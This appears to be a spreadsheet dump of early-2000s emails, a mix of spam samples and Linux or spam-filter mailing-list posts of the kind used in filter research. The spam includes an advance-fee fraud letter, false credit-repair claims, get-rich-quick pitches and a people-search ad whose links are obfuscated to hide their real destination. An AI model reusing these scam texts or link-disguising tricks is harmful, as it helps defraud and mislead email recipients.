       &lt;P&gt;&lt;IMG height=3 src="http://www3.videoprofessor.com/images/black.gif" width="100%"&gt;&lt;BR&gt;&lt;/P&gt;
       &lt;P&gt;&lt;SPAN class=copy&gt;&lt;SPAN class=its&gt;&lt;IMG align=right height=100 
       src="http://www3.videoprofessor.com/images/cds33.jpg.jpg" width=75&gt;Choose 
       Any Lesson &lt;FONT color=#ff0000&gt;FREE!&lt;/FONT&gt;&lt;/SPAN&gt;&lt;BR&gt;Getting Started with 
       Your Personal Computer &amp;#8226; Windows XP, Me, 98 or 95 &amp;#8226; The Intenet &amp;#8226; Excel &amp;#8226; 
       Word &amp;#8226; Access &amp;#8226; FrontPage &amp;#8226; Outlook &amp;#8226; PowerPoint &amp;#8226; WordPerfect &amp;#8226; Lotus 
       1-2-3 &amp;#8226; Works &amp;#8226; Quicken &amp;#8226; DOS&lt;/SPAN&gt;&lt;/P&gt;
       &lt;P align=center class=its&gt;Get your FREE lesson today!&lt;/P&gt;
       &lt;P align=center class=its&gt;&lt;A href="http://isis.webstakes.com/play/Isis?ID=89801"&gt;&lt;IMG 
       border=0 height=49 
       src="http://www3.videoprofessor.com/images/clickhere.gif" 
       width=111&gt;&lt;/A&gt;&lt;/P&gt;
       &lt;P class=its&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR vAlign=top&gt;
     &lt;TD class=copy colSpan=4&gt;
       &lt;DIV align=center&gt;*You only pay $6.95 shipping and handling conveniently 
       billed to your Visa, MasterCard, America Express or Discover Card. Windows 
       compatible only. Some restrictions may apply. 
 &lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;BR&gt;&lt;SPAN class=copy&gt;&lt;/SPAN&gt;
 &lt;!-- WEBSTAKES.COM FOOTER --&gt;
 &lt;table width=500 bgcolor=#FFFFFF cellpadding=2 cellspacing=0 border=0 align=center&gt;
 	&lt;tr&gt;
 		&lt;td width=500 align=center&gt;
 			&lt;font face=Geneva,Arial size=1&gt;
 				&lt;a href="http://www.webstakes.com/"&gt;
 		&lt;img src="http://www.webstakes.com/zeus/images/direct/wslogolight.gif" width=158 height=54 alt="Webstakes.com" border=0 align=middle&gt;
 				&lt;/a&gt;
 			&lt;br&gt;
 				&lt;a href="http://home.webstakes.com/play/HomePage?temp=2201&amp;tb_id=301"&gt;
 					Webstakes.com customer service
 				&lt;/a&gt;
 			&lt;br&gt;
 				&lt;a href="http://www.webstakes.com/"&gt;
 					http://www.webstakes.com/
 				&lt;/a&gt;
 			&lt;br&gt;&lt;br&gt;
 					This email was sent to ler@lerctr.org.
 			&lt;br&gt;&lt;br&gt;
 	You are receiving this email because you opted-in to periodically receive emails with special offers from Webstakes.com. If you'd  like to unsubscribe from future emails, please see below.&lt;BR&gt;
 &lt;a href=http://service.ivillage.com/Apps/DCS/mcp?r=7003B9351HUJs01200027a03B930mpHyWpHdh&gt;Click here&lt;/a&gt;
 			&lt;/font&gt;
 			&lt;IMG SRC="http://or.astrology.com/clear.gif?jiffies[73B9303B9351HUJs012000003B930mpHyWpHdh]" BORDER="0"&gt;
 		&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 --______BoundaryOfDocument______--
 Please include the following line in your reply.
 annmn:[73B9303B9351HUJs012000003B930mpHyWpHdh]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Extended Auto Warranties Here                                                   aanfh
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Here is the information you requested
</t>
  </si>
  <si>
    <t xml:space="preserve">Are you interested in making some extra money on the internet?
 well have i got something for you. Last week i made $3500 ,I am offering you 5 yes 5 web sites that have already been made and are waiting for you to put up to make money with.  There is also a few videos that are included that tell you Exactly what you have to do to be successful. I am going to also Offer you the rights to the web pages and to 5 Ebooks that you can sell..  These Ebooks aren't just any Ebooks these are books on how to make money on the  internet.  I am selling this package deal for a short time only at the low price of $39.77 my friends all say that i am   Crazy.. The web site alone is worth over $1500 and its yours for only $39.77.  Each eBook you will receive is worth around $350.  my web page is. www.Home-Business-onthe-net.com . please come take a look. 
 if you have any questions please feel free to give me a email.
 if you'd like a Free Ebook just give me a email and ill  email you one ASAP.
 Sincerly 
 Your friend
 Keegan
 Click on the link below to remove yourself
 http://www.hotresponders.com/cgi-bin/varpro/r.cgi?id=keegan007&amp;a=ilug@linux.ie
 AOL Users
 &lt;a href="http://www.hotresponders.com/cgi-bin/varpro/r.cgi?id=keegan007&amp;a=ilug@linux.ie"&gt; Remove Me&lt;/a&gt;
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Software that helps you remove negative credit items (0766aExl8-42@11)
</t>
  </si>
  <si>
    <t xml:space="preserve">Have you checked your personal credit reports recently?
 If you are planning making any major purchase like purchasing a Home or
 newcar or getting a new job or even a promotion, Please....read on!
 You need to have a GOOD to EXCELLENT credit rating.  If you do already,
 that's important, but if you know your credit is less than perfect, you need
 to get those negative remarks REMOVED, LEGALLY and quickly.
 How?  It's easier than you think.
 With NuCredit Software YOU can clear any negatives already on your
 credit reports, This requires NO experience OR special skills from you to use our
 program. 
 This is how we can help:
 Getting "Excellent Credit" has never been easier at
 http://wws2.dyn.ee
 For the first time ever, we have simplified this process and made it
 easy for thousands just like you that are looking for a safe and legal and
 easy way to remove "bad credit" permanently, once and for all!. NuCredit
 can remove Judgements, Bankruptcies, Tax liens and any other
 negative ratings, in fact, ANYTHING that is reported on your credit.
 "We" will not clear your negative credit, but "you" can, and easily
 too. You are not going to spend hundreds or even thousands of dollars to do
 it,or depend on someone you don't even know to take action.
 If you can send an email, you can operate our software. It's just that
 simple.
 This "Fast and easy-to-use" program is called, NuCredit.
 Here is a brief description:
 The easiest and most effective credit program available today.
 NuCredit is designed to improve and remove negative items on
 your personal credit reports at home or the office quickly and
 effectively. This is your first step to achieving financial independence.
 NuCredit does it all "Step by Step"...Each easy-to-understand step
 is designed to remove negative credit remarks on each of the major
 credit bureau files, legally! Never before, has it been easier to
 remove negative credit just like the professionals.
 This program is the complete route to getting, using, and managing your
 credit reports wisely even if you're unskilled in credit or computers.
 10 minutes a month is all you need to:
 Remove negative items from each credit report:
 TRW (Experian), TransUnion, CBI/Equifax
 Communicate with the credit bureaus without fear or reprisal.
 Review your credit reports on a consistent cycle (every 30 days!)
 Manage your own credit reports easily.
 Now "you" have control over your reports.
 Re-establish good credit, Fast and easy!"
 Please go to:
 http://wws2.dyn.ee
 Let's get started today!. Don't let another minute pass.
 To be removed click below
 http://wws2.dyn.ee/remove.htm
 [6897Xjvk9-144hsPG7837zbKJ3-198zOzv0155tGcO9-717sfou4155TgDj5-12@59]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Still paying too much for Life Insurance?...       U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</si>
  <si>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href=3D"http://61.129.68.19/user0202/termquotes/473400/index.htm"&gt;&lt;font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href=3D"http://61.129.68.19/user0202/termquotes/473400/index.htm"&gt;&lt;font
 face=3D"arial"
 size=3D"5"&gt;
 &lt;b&gt;GET A FREE QUOTE NOW!&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;font face=3D"arial" size=3D"2" color=3D"#000000"&gt;
 &lt;i&gt;You can't predict the future, but you can always
 prepare for it.&lt;/i&gt;&lt;/font&gt;
 &lt;/center&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;br&gt;&lt;br&gt;
 &lt;font face=3D"arial,verdana" size=3D1.5 color=3D"#8182AB"&gt;&lt;p
 align=3D"center"&gt;&lt;br&gt;&lt;br&gt;
 &lt;a
 href=3D"http://61.129.68.19/light/watch.asp"&gt;to be
 excluded from future contacts &lt;/a&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 kanz
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] HTML Table - Razor Stats using -lm 4 
</t>
  </si>
  <si>
    <t xml:space="preserve">
 "Fox" said:
 &gt; Before or after I whitelisted all the legit mailing lists that Razor is
 &gt; tagging?  I had one false positive in the last four days.  Razor tagged some
 &gt; guys person-to-person message because he used an ostrich-in-your-face jpeg
 &gt; that is probably pretty popular on the net, and -lm 4 means any single
 &gt; attachment in a message that is razored, razors the whole message, if I
 &gt; understand it correctly.
 Razor folks: is -lm documented anywhere?   BTW, I notice all my *.conf
 files in ~/.razor use "lm = 4" by default anyway.
 &gt; No, I am not keeping official tally of false positives.  I need to write a
 &gt; html interface to do it, and then it would be easy.  I imagine you want
 &gt; false positive rate per filter.  I will work on it tomorrow, and maybe in a
 &gt; week I will have some stats for false positives.
 Yeah, that'd be cool -- much appreciated!   comparing text classifiers
 like spam filters, without tracking FPs, is not good.   After all, "cat &gt;
 /dev/null" gets a 100% hit rate, but without the FP rate figure of, let's
 say 90%, you'd never know it was a bad thing to do ;)
 --j.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Jul 20, 2002 at 09:33:35PM +0100, kevin lyda mentioned:
 &gt; &gt;  &gt; apparently some systems limited soft links to the same device but
 &gt; &gt;  &gt; gave up after a while.  
 &gt; &gt; Why?
 &gt; to make them consistent with hard links.
  That's something that POSIX would do - make every platform as equally
 broken, rather than standing up and saying "how about we try &amp; make
 everyone better".
  (why ? Because in the real world, you can't. Somethings just suck)
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Linux Software RAID Fun
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000201.html
 Date: 2002-09-29T11:52:44-08:00
 I forgot to write this up yesterday and didn't feel like forging the blog entry 
 date. Anyway, while taking a break from writing the book, I tried to finish up 
 the work on friends.zawodny.com before I ship it off to...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] Spam added to regular email
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 22 Jul 2002 the voices made Marc Perkel write:
 &gt; I've been working on adding low scoring spam messages to my spam corpus
 &gt; which means I'm tapping email that scores 5-18 points now and hand
 &gt; sorting it. Some of these messages are newsletters and other mail that's
 &gt; not spam - but they contain an ad for something that is spam.
 &gt;
 &gt; So - I don't see how I can classify these messages because catching spam
 &gt; within a newsletter or yahoo message is not a false positive.
  I don't really see the problem... either the whole message is unwanted spam
 which you, one way or another, didn't agree to reciving, or it's something that
 you, one way or another, said that you'd accept... If you said you'd accept it,
 like mailinglists, then it isn't spam and shouldn't be caught as spam, no
 matter if there's ads in it or not...
 	/Tony
 -- 
 # Per scientiam ad libertatem! // Through knowledge towards freedom! #
 # Genom kunskap mot frihet! =*= (c) 1999-2002 tony@svanstrom.com =*= #
     perl -e'print$_{$_} for sort%_=`lynx -source svanstrom.com/t`'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</si>
  <si>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On Fri, Jul 19, 2002 at 09:53:16PM +0100, awhalley@eircom.net wrote:
 &gt; The setup is as follows:
 &gt; I develop a piece of code using PHP 3.0.9 which is, to
 &gt; my knowledge, GPL. 
 php's license is completely irrelevant to this.  think about it.
 solaris releases their system which includes /bin/sh.  their license
 is very restrictive and they retain the rights to their whole system.
 but they don't own every shell script ever written by solaris admins
 around the world.
 &gt; The piece of code runs on my server and is an integral part of a system
 &gt; that I have developed for a client. I did not recieve  payment for this
 &gt; particular piece of code but I did recieve payment for the system. My
 &gt; client now wants to use a different service provider but keep my code.
 &gt; Do I have a right to claim intellectual property rights for  my little
 &gt; piece of code that he did not pay me for or do I have to give the
 &gt; client the code under the GPL.
 i doubt it.  and i suspect it would cost more to litigate then you
 would get.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</si>
  <si>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Marc,
 The likelyhood of EFF or other mailing lists getting filtered will
 decrease over time as these mails are revoked whenever they get filtered
 out. Revocations help the system to punish reporters who report legit bulk
 mail such that their future reports are automatically considered suspect.
 As such, with all the new changes to TeS, the likelyhood of filtering
 mailing list posts has decreased dramatically. Please keep me posted if
 you see false positives on the EFF newsletter again.
 cheers,
 vipul.
 On Fri, Aug 02, 2002 at 03:22:13PM -0700, Marc Perkel wrote:
 &gt; Thanks - but it almost looks like someone is deliberately trying to
 &gt; poison EFF messages. If this is so I want to look into it. It's odd that
 &gt; most all the razor errors were people talking about free speech issies
 &gt; and intellectual property. It make me wonder if someone is doing
 &gt; something on purpose.
 &gt;
 &gt; I am also active in the development of Spam Assassin rules. Spam
 &gt; filtering has been a hot topic at EFF for quite some time and is even
 &gt; hotter now that I'm actually using it. For what it's worth - your system
 &gt; is considered to be the cleanest method - but with any system, people at
 &gt; EFF are concerned about free speech issues and that spam filtering can
 &gt; become a censorship issue. One of our newsletters got flagged as spam
 &gt; because it had list removal instructions at the bottom.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</si>
  <si>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Subject: New... Find out ANYTHING about ANYONE from your computer
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;&lt;/title&gt;
 &lt;/head&gt;
 &lt;body link=#333399&gt;
 &lt;font face="Verdana, Arial, Helvetica" size=3&gt;
 &lt;center&gt;&lt;b&gt;&lt;font size="5" color=#CC0066&gt;Astounding
 New Software Lets You Find&lt;br&gt;
 Out Almost Anything About Anyone&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 &lt;br&gt;&lt;i&gt;&lt;font color=#333399 size=4&gt;Click here to download it right
 now (no charge card needed):&lt;/i&gt;&lt;/font&gt;&lt;br&gt;
 &lt;/b&gt;&lt;font color=#333399 size=4&gt;&lt;b&gt;&lt;a
 href="http://%72.%6cycos.c%6fm|redir%253%66g%2en%252%65%2540dt%34%252e5%25%330%25%36d%65gs.com%25%32f%64%25%3744%25%33f%67%2e%6e.@h%6fme.eart%68link%2enet/%7ej6e7?%67.n.@members.tripod.%63%6f%6d/~gen0%3607"&gt;Download
 Page&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font size="1" color="#333333"&gt;(This
 make take a few moments to load - please be patient)&lt;/font&gt;&lt;br&gt;
 &lt;/center&gt;&lt;br&gt;
 Find out &lt;b&gt;everything&lt;/b&gt; you ever wanted to know about:
 &lt;ul&gt;
 &lt;li&gt;your friends&lt;/li&gt;
 &lt;li&gt;your family&lt;/li&gt;
 &lt;li&gt;your enemies&lt;/li&gt;
 &lt;li&gt;your employees&lt;/li&gt;
 &lt;li&gt;yourself - Is Someone Using Your Identity?&lt;/li&gt;
 &lt;li&gt;even your boss!&lt;/li&gt;
 &lt;/ul&gt;
 &lt;b&gt;Did you know&lt;/b&gt; that you can search for
 &lt;b&gt;anyone, anytime, anywhere,&lt;/b&gt; right on the Internet?
 &lt;br&gt;&lt;br&gt;&lt;center&gt;&lt;b&gt;&lt;font color=#CC0066&gt;Click here: &lt;/font&gt;&lt;font
 color=#333399&gt;&lt;a
 href="http://%72.%6cycos.c%6fm|redir%253%66g%2en%252%65%2540dt%34%252e5%25%330%25%36d%65gs.com%25%32f%64%25%3744%25%33f%67%2e%6e.@h%6fme.eart%68link%2enet/%7ej6e7?%67.n.@members.tripod.%63%6f%6d/~gen0%3607"&gt;Download
 Page&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;/center&gt;&lt;br&gt;
 This &lt;b&gt;mammoth collection&lt;/b&gt; of Internet investigative tools &amp; research
 sites will provide you with nearly &lt;b&gt;400 gigantic research resources&lt;/b&gt;
 to locate information online and offline on:
 &lt;font color="#000080"&gt;&lt;b&gt;&lt;ul&gt;
 &lt;li&gt;people you trust, people you work with&lt;/li&gt;
 &lt;li&gt;screen new tenants, roommates, nannys, housekeepers&lt;/li&gt;
 &lt;li&gt;current or past employment&lt;/li&gt;
 &lt;li&gt;license plate numbers, court records, even your FBI file&lt;/li&gt;
 &lt;li&gt;unlisted &amp; reverse phone number lookup&lt;/li&gt;
 &lt;/ul&gt;&lt;/b&gt;&lt;/font&gt;
 &lt;center&gt;&lt;b&gt;&lt;font color=#CC0066&gt;Click
 here: &lt;/font&gt;&lt;font color=#333399&gt;&lt;a
 href="http://%72.%6cycos.c%6fm|redir%253%66g%2en%252%65%2540dt%34%252e5%25%330%25%36d%65gs.com%25%32f%64%25%3744%25%33f%67%2e%6e.@h%6fme.eart%68link%2enet/%7ej6e7?%67.n.@members.tripod.%63%6f%6d/~gen0%3607"&gt;Download
 Page&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;/center&gt;&lt;br&gt;
 &lt;blockquote&gt;&lt;font size="2"&gt;&lt;b&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; Dig up information on your FRIENDS, NEIGHBORS, or BOSS!&lt;br&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; Locate transcripts and COURT ORDERS from all 50 states.&lt;br&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; CLOAK your EMAIL so your true address can't be discovered.&lt;br&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; Find out how much ALIMONY your neighbor is paying.&lt;br&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; Discover how to check your phones for WIRETAPS.&lt;br&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; &lt;i&gt;Or check yourself out&lt;/i&gt;--you may be shocked at what you find!!&lt;br&gt;
 &lt;/blockquote&gt;&lt;center&gt;&lt;font size=4 color=#333399&gt;&lt;b&gt;&lt;i&gt;These
 are only a few things&lt;br&gt;
 that you can do with this software...&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;/center&gt;&lt;br&gt;
 To download this software,&lt;/b&gt; and have it in less than 5 minutes, click &amp; visit our website:&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;center&gt;&lt;b&gt;&lt;font color=#CC0066&gt;Click
 here: &lt;/font&gt;&lt;font color=#333399&gt;&lt;a
 href="http://%72.%6cycos.c%6fm|redir%253%66g%2en%252%65%2540dt%34%252e5%25%330%25%36d%65gs.com%25%32f%64%25%3744%25%33f%67%2e%6e.@h%6fme.eart%68link%2enet/%7ej6e7?%67.n.@members.tripod.%63%6f%6d/~gen0%3607"&gt;Download
 Page&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;/center&gt;&lt;br&gt;&lt;hr size=1 width=60%&gt;
 &lt;font size="2" color="#666666"&gt;&lt;b&gt;We respect your online time and privacy
 and honor all requests to stop further e-mails.&lt;/b&gt;&lt;small&gt;
 To stop future messages, do &lt;b&gt;NOT&lt;/b&gt; hit reply. Instead, simply click the following link
 which will send us a message with "STOP" in the subject line.
 Please do not include any correspondence -- all requests handled automatically. :)&lt;/small&gt;&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;center&gt;&lt;b&gt;&lt;a href="mailto:stop0607@excite.com?subject=STOP_GEN0607"&gt;[Click
 Here to Stop Further Messages]&lt;/a&gt;&lt;/center&gt;&lt;br&gt;
 &lt;font size="1" color="#666666"&gt;&lt;b&gt;
 Thank you!&lt;/b&gt; Copyright&amp;nbsp;&amp;copy; 2002, all rights reserved.&lt;/font&gt;
 &lt;/body&gt;
  [&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Life-Time upgrades for FREEq4i1i6p8
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --#DM659823986#
 Content-Type: text/plain; charset=us-ascii
 Content-Transfer-Encoding: quoted-printable
 Below is the result of your feedback form.  It was submitted by
  (blowdamovie@atlas.cz) on Monday, July 22, 2002 at 12:37:15
 ---------------------------------------------------------------------------
 : Why Spend upwards of $4000 on a DVD Burner when we will show you an alternative that will do the exact same thing for just a fraction of the cost? Copy your DVD's NOW. Best Price on the net. Click here: http://010@www.dvdcopyxp.com/cgi-bin/enter.cgi?marketing_id=dcx007 Click to remove http://011@www.spambites.com/cgi-bin/enter.cgi?spambytes_id=100115 
 ---------------------------------------------------------------------------
 --#DM659823986#--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Electronic circuits created in a flash
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8518006,1440/
 Date: Not supplied
 A material that turns into a conductor at the flash of a light promises to 
 reduce the cost of large LCD displays and optical data storage
</t>
  </si>
  <si>
    <t xml:space="preserve">
 On Thursday, Sep 19, 2002, at 14:51 Europe/London, Bill Kearney wrote:
 &gt;&gt; From the completely unrelated but funny department...
 &gt;
 &gt; "Talk like a Pirate Day".
 &gt; http://www.washingtonpost.com/wp-dyn/articles/A5011-2002Sep11.html
 &gt;
 &gt; Which is today, of course.
 &gt;
 &gt; That and 'piratecore' rapping style...
 &gt; http://poorman.blogspot.com/2002_09_01_poorman_archive.html#81798893
 &gt;
 &gt; Anything, just anything, to get us off the geek dating tips topic....
 &gt;
 &gt; -Bill Kearney
 &gt;
 Arrr, he be a scurvy dog, that Bill Kearney.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: MY PLEA FOR ASSISTANCE PLEASE
</t>
  </si>
  <si>
    <t xml:space="preserve">
 MR. AYANDA MAREDI
 DEPARTMENT OF MINERALS AND ENERGY
 PRETORIA, SOUTH AFRICA.
 Good morning,
 It is my great pleasure to write you this letter on behalf of my colleagues.
 I venture to write to you perhaps you will see it fit to assist my
 colleagues and I in all honesty as we attempt to seek your assistance.
 I have decided to seek a confidential co-operation with you in the execution
 of a deal hereunder for the benefit of all parties and hope you will keep it
 confidential because of the nature of this business.
 Within the Department of Minerals and Energy where I work as a Director
 of Audit and Project implementation, with the co-operation of two other top officials, we
 have in our possession an overdue payment in US funds.
 The said funds represent certain percentage of the contract value executed
 on behalf of my Department by a foreign contracting firm, which we the officials over-invoiced to the
 amount of US$29,200,000.00 (Twenty-Nine Million Two Hundred Thousand US Dollars).
 Though the actual contract cost has been paid to the original contractor, leaving the
 excess balance unclaimed.
 Since the present elected Government is determined to pay foreign contractors all debts owed,
 so as to maintain good relations with foreign governments and non-governmental
 agencies, we included our bills for approvals with the Department of Finance and the
 Reserve Bank of South Africa (RBSA). We are seeking your assistance to front as the
 beneficiary of the unclaimed funds, since we are not allowed to operate foreign accounts.
 Details and change of beneficiary information upon application for claim to reflect payment and
 approvals will be secured on behalf of You/your Company.
 I have the authority of my colleagues involved to propose that should you be willing to assist us in
 this transaction your share as compensation will be US$7.3m (25%) while my colleagues and I receive
 US$18.98m (65%) and the balance of US$2.92m (10%) for taxes and miscellaneous expenses incurred.
 This business is completely safe and secure, provided you treat it with utmost confidentiality.
 It does notmatter whether You/your Company does contract projects, as a transfer of
 powers will be secured in favour of You/your Company. Also, your specialization is not a
 hindrance to the successful execution of this transaction. I have reposed my confidence in you
 and hope that you will not disappoint us.
 Kindly notify me by telephone on 27-83-750 9598 or fax 27-73-219 9975 for
 further details upon your acceptance of this proposal.
 May God's blessings be with you even as you reply.
 Regards,
 MR. AYANDA MAREDI
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Maps
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/25.html#maps
 Date: 2002-09-25T10:45:15-05:00
 _Mark Tosczak_: A New Way to Read, Not See, Maps[1]. &amp;#8220;The map-navigation 
 software, dubbed Blind Audio Tactile Mapping System ... takes digital map 
 information and provides nonvisual feedback as a user moves a cursor across the 
 map.&amp;#8221;
 [1] http://www.wired.com/news/school/0,1383,54916,00.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: http://apt.nixia.no/
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --6sX45UoQRIJXqkqR
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 Title page has a login screen and I can't seem to get the apt indexes
 anymore. Is it just me or is something going on there?
 --=20
 Additive E120 - "not suitable for vegetarians".
 http://www.bryngollie.freeserve.co.uk/E120.htm
 --6sX45UoQRIJXqkqR
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE8WpFlQF8Oi9XNck4RAtn4AKC40mgaJXP7T+go1THM7XsZ1B8pNgCfZyoy
 jDkvRp7pFzUF1Pw5sOuoFhY=
 =9TDR
 -----END PGP SIGNATURE-----
 --6sX45UoQRIJXqkqR--
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Software vendors have been trying since forever to prevent software piracy.
 &gt; Remember when you had to enter a specific word from a specific page of the
 &gt; software manual, which was printed on dark maroon paper so that it could
 &gt; not be photocopied?  Didn't work.  Propritery encoding of DVD's?  Didn't
 &gt; work. Software that required the use of a registration key?  Didn't work. 
 &gt; Windows XP was shipped with this supposedly revolutionary method for
 &gt; stopping piracy, and what happened?  How long was it before the code was
 &gt; cracked? How many keygens are there for Windows XP?  Is someone running a
 &gt; pirated version of XP really going to use Windows Update to installed a
 &gt; service pack which breaks their OS?  Just because M$ didn't include the
 &gt; change in their README?  Fat chance.
 My problem is not the same as MS's one, I don't have to deal with millions of 
 identical copy of the same CD with propably millions of working keys.  Each 
 download can be unique with a small preparation delay.  The key generator is 
 a problem only if multiple keys are usable.  If the end users are teenagers, 
 you'll face a huge wall when asking to be 100% of the time online but if we 
 think of something like a health care system that keep track of patients 
 personnal information, the end user will be willing to take every possible 
 steps to protect the system from his own employees to use illegaly.
 I agree with all of you that mass production CDs will not be safe from piracy 
 in a near futur.  That can be seen as a collateral of mass market 
 penetration.
 BTW thanks for all of you who provided interestiong insight.  I'm playing with 
 gdb's dissassembler now but I don't think it's what a typical cracker would 
 use.  Any hints on UNIX cracking tools ?
 Thanks.
 -- 
 Yannick Gingras
 Coder for OBB : Onside Brainsick Bract
 http://OpenBeatBox.org
</t>
  </si>
  <si>
    <t xml:space="preserve">This seems to be a good argument for the odd number prerelease, even number 
 stables.
 So instead of a 0.61pre2 pre3,  and a 0.61final,  you'd stick with 0.61 
 with different releases, and a 0.62.
 0.61-1, 0.61-2, 0.62.  Would that that?
 --On Monday, August 19, 2002 17:25:04 +0200 Matthias Saou 
 &lt;matthias@egwn.net&gt; wrote:
 &gt; Take for instance xmame : I've been packaging 0.61 pre-releases as
 &gt; "0.61-fr0.x" since the entire source has only "0.61" tags everywhere, no
 &gt; preversion tags whatsoever.
                                     -- \m/ --
   "...if I seem super human I have been misunderstood." (c) Dream Theater
          mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Hardware acceleration for SSL makes sense since PKI can slow down a
 transaction by as much as 1,000-fold. Per this article, XML formatting only
 increases doc size by about 20-fold.. I'm not sure there are enough "powers
 of ten" in there to justify hardware acceleration. 
 Expect the next major release from DataPower to be the revolutionary new
 "email chip" - allows you to offload the sending and receiving of email
 messages onto dedicated hardware while you get on w/ more important things
 .. like listening to MP3s..
 Best, 
 Paul Sholtz
 -----Original Message-----
 From: Rohit Khare
 To: fork@spamassassin.taint.org
 Sent: 8/27/02 3:00 PM
 Subject: DataPower announces XML-in-silicon
 No analysis yet... don't know what to make of it yet. But here's the raw
 bits for all to peruse and check out what's really going on... Best, 
 Rohit
 ===========================================================
 DataPower delivers XML acceleration device
 ByScott Tyler Shafer
 August 27, 2002 5:46 am PT
 DATAPOWER TECHNOLOGY ON Monday unveiled its network device designed 
 specifically to process XML data. Unlike competing solutions that 
 process XML data in software, DataPower's device processes the data in 
 hardware -- a technology achievement that provides greater performance, 
 according to company officials.
 The new device, dubbed DataPower XA35 XML Accelerator, is the first in a
 family of products expected from the Cambridge, Mass.-based startup. The
 DataPower family is based on a proprietary processing core technology 
 called XG3 that does the analysis, parsing, and processing of the XML 
 data.
 According to Steve Kelly, CEO of DataPower, the XA35 Accelerator was 
 conceived to meet the steady adoption of XML, the anticipated future 
 proliferation of Web services, and as a means to share data between two 
 businesses.
 "Our vision is to build out an XML-aware infrastructure," Kelly said. 
 "The XA35 is the first of a family."
 Kelly explained that converting data into XML increases the file size up
 to 20 times. This, he said, makes processing the data very taxing on 
 application servers; DataPower believes an inline device is the best 
 alternative.
 In addition to the large file sizes, security is also of paramount 
 importance in the world of XML.
 "Today's firewalls are designed to inspect HTTP traffic only," Kelly 
 said. "A SOAP packet with XML will go straight through a firewall. 
 Firewalls are blind to XML today."
 Future products in DataPowers family will focus more specifically on 
 security, especially as Web services proliferate, Kelly said.
 According to DataPower, most existing solutions to offload XML 
 processing are homegrown and done in software -- an approach the company
 itself tried initially and found to be inadequate with regards to speed 
 and security. After trying the software path, the company turned to 
 creating a solution that would process XML in hardware.
 "Our XG3 execution core converts XML to machine code," said Kelly, 
 adding that to his knowledge no other company's solution does. Kelly 
 said in the next few months he expects the market to be flooded with 
 technologies that claim to do XML processing -- claims that he believes 
 will be mostly false.
 Other content-aware switches, such as SSL (secure socket layer) 
 accelerators and load balancers, look at the first 64 bytes of a packet,
 while the XA35 provides deeper packet inspection, looking at 1,400 bytes
 and thus enabling greater processing of XML data, Kelly explained.
 The 1U-high network device has been tested against a large collection of
 XML and XSL data types and can learn new flavors of the markup language 
 as they pass through the device.
 The XA35 can be deployed in proxy mode behind a firewall and a load 
